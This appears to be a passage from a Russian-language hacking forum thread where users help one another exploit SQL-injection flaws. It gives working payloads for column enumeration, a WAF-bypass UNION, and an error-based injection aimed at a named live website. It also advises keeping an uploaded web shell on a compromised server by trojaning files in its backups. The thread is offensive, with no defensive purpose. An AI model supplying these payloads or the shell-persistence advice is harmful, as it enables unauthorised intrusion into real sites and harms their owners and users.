noviyuser работа с постгрес, немного отличается, не всегда требуется подобрать колонки, можно просто составить запрос id=1+and+1=value постгре тоже любит подзапросы
Как обойти защиту на сервере от изменения файлов? Заливаю шелл он удаляется через неск минут, или изменяю любой файл, и через пару минут он откатуется!
возможно это автоматический бекап, или админ не спит там вариант то что протроянить скрипты прям из бекапа, если конечно есть права не бекапанные файлы, пробуй найти их
А если вот посты там создаются или еще что то, оно ж не будет делать бекап? адмни отпадает Просто рес очень жирный во всех планах.
посты сохраняются в базе данных а не в скриптах лучше прям забиндится, и нормально анализировать систему
Если кому нибуть не в лом, из знатоков, прошу объяснить новичку элементарную вещь. При простом заросе в базу данных типа: $db=mysql_query("SELECT * FROM table WHERE id='$_GET['id']' "); $db=mysql_fetch_array($db); и при вводе в url адреса http://site.ru/index.php?id=1' выдает ошибкуWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in... ...и дальше не идет... тоесть при вводе http://site.ru/index.php?id=1'+order+by+1-- все равно выдает ошибку... Казалось бы золотая sql'ka, но разобратся с этим ни как не могу. Заранее спс!
При твоем варианте должно быть MQ = Off. Если такое имеется, то http://site.ru/index.php?id=1'+order+by+1+--+ то есть запрос становиться таким SELECT * FROM table WHERE id='' order by 1+--+ Если mq = on - ничего не получиться. получиться так: "SELECT * FROM table WHERE id='\' union select ...' и инъекции не будет. Как говорил Dr.Z3r0
Не знаю, что и куда ты там вводишь, но твой скрипт даже не запуститься, потому что он синтаксически неверен. Правильно: PHP: $db=mysql_query("SELECT * FROM table WHERE id=' ".$_GET['id']." ' "); $db=mysql_fetch_array($db); Эксплуатация: HTML: 1' order by 1,2,3,4,5,6,7,8,9,10-- a И так далее. Ну и magic_quotes должны быть off соответственно.
Warning: include(/var/www/xxxx.com/1\'.php) [function.include]: failed to open stream: No such file or directory in /var/www/xxx/index.php on line 34 Warning: include() [function.include]: Failed opening '/var/www/xxxxx.com/1\'.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/xxxx.com/index.php on line 34 что ето за ошибка обьесните плиз и чт можно зделать?
Народ помогите разобраться стакой скулей: _http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=-9+union+select+1,2,3-- //выводит Error processing request но при group by оприделилось три поля, как понимаю тут фильтрация, и подскажите где можно статейку о более сложных скулях почитать...
там стоит фильтрация или фаервол какой-нибудь, так что нужно знать как обходить эти фильтры. Тема поднималась сто раз, так что ищем. Ну я думаю если найдёшь и обойдёшь, то узнаешь что там несколько запросов на странице, значит нужен вывод через ошибку, так что ищем сразу же вывод через ошибку
обходится спокойно, но через юнион селект не крутится http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=9+/*!union*/+select+1,2,3 так что error based http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=9+or+1+group+by+concat+(version(),floor(rand(0)*2))having+min(0)+or+1
подскажите если при подставлении кавычки скажем something.php?blabla=asd' показывает страницу something.php как эту уязвимость эксплуатировать?
